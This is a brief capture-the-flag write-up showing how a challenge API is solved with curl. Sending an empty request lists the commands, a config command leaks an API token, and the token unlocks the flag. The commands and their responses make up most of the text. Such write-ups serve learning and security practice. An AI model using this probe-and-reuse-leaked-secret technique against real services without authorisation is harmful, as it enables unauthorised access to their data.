Description:

Visit the site at https://ggcs-wm03.allyourbases.co and investigate the API that serves the page to find a way to get the flag.

To the developer console and the network tab, we find that it's making requests shaped like this:

curl -X POST "https://oo5apsmnc8.execute-api.eu-west-1.amazonaws.com/stag/wm03" -d '{"getUser": 1}'

Let's try not providing anything in that JSON object:

curl -X POST "https://oo5apsmnc8.execute-api.eu-west-1.amazonaws.com/stag/wm03" -d '{}'
{"statusCode": 200, "body": {"commands": ["getUser", "setUser", "getFlag", "config"]}}

Hello.

curl -X POST "https://oo5apsmnc8.execute-api.eu-west-1.amazonaws.com/stag/wm03" -d '{"getFlag": {}}'
{"statusCode": 200, "body": {"error": "missing api_token."}}

:(

What about that config endpoint?

curl -X POST "https://oo5apsmnc8.execute-api.eu-west-1.amazonaws.com/stag/wm03" -d '{"config": {}}'
{"statusCode": 200, "body": {"api_token": "supersecret31337apitoken"}}

Oops.

curl -X POST "https://oo5apsmnc8.execute-api.eu-west-1.amazonaws.com/stag/wm03" -d '{"getFlag": {}, "api_token": "supersecret31337apitoken"}'
{"statusCode": 200, "body": {"flag": "LAx_AUThEntiCaTION-:("}}

(technically, this isn't lax authentication, it's sensitive data exposure)